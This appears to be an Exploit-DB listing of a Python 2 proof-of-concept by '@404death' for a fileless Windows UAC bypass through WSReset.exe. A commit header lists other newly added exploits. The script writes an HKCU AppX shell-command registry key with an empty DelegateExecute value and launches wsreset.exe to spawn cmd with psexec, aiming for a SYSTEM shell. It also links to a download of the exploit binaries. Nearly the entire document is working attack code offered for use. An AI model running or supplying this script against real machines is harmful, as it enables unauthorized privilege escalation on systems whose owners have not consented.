44b163c8d1
11 changes to exploits/shellcodes Omron PLC 1.0.0 - Denial of Service (PoC) Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Microsoft Windows - Multiple UAC Protection Bypasses Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry) Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll) SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH) Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Alcatel-Lucent Omnivista 8770 - Remote Code Execution Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
63 lines
No EOL
2.3 KiB
Python
Executable file
63 lines
No EOL
2.3 KiB
Python
Executable file
#### Fileless UAC bypass (WSReset.exe)
|
|
#### @404death
|
|
#### base on : https://www.activecyber.us/activelabs/windows-uac-bypass
|
|
#
|
|
## EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47754.zip
|
|
#
|
|
import sys, os
|
|
from ctypes import *
|
|
import _winreg
|
|
CMD = r"C:\Windows\System32\cmd.exe"
|
|
WS_RESET = r'C:\Windows\System32\wsreset.exe'
|
|
#PYTHON_CMD = "python"
|
|
test_cmd = " -i -s cmd.exe"
|
|
SYSTEM_SHELL = "psexec.exe" # to get nt\system
|
|
REG_PATH = 'Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command'
|
|
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
|
|
def is_running_as_admin():
|
|
'''
|
|
Checks if the script is running with administrative privileges.
|
|
Returns True if is running as admin, False otherwise.
|
|
'''
|
|
try:
|
|
return ctypes.windll.shell32.IsUserAnAdmin()
|
|
except:
|
|
return False
|
|
def create_reg_key(key, value):
|
|
'''
|
|
Creates a reg key
|
|
'''
|
|
try:
|
|
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
|
|
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
|
|
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
|
|
_winreg.CloseKey(registry_key)
|
|
except WindowsError:
|
|
raise
|
|
def bypass_uac(cmd):
|
|
'''
|
|
Tries to bypass the UAC
|
|
'''
|
|
try:
|
|
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
|
|
create_reg_key(None, cmd)
|
|
except WindowsError:
|
|
raise
|
|
def execute():
|
|
if not is_running_as_admin():
|
|
print '[!] Fileless UAC Bypass via Windows Store by @404death '
|
|
print '[+] Trying to bypass the UAC'
|
|
print '[+] Waiting to get SYSTEM shell !!!'
|
|
try:
|
|
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + SYSTEM_SHELL
|
|
cmd = '{} /c {} {}'.format(CMD, current_dir, test_cmd)
|
|
bypass_uac(cmd)
|
|
os.system(WS_RESET)
|
|
print '[+] Pwnedd !!! you g0t system shell !!!'
|
|
sys.exit(0)
|
|
except WindowsError:
|
|
sys.exit(1)
|
|
else:
|
|
print '[+] xailay !!!'
|
|
if __name__ == '__main__':
|
|
execute() |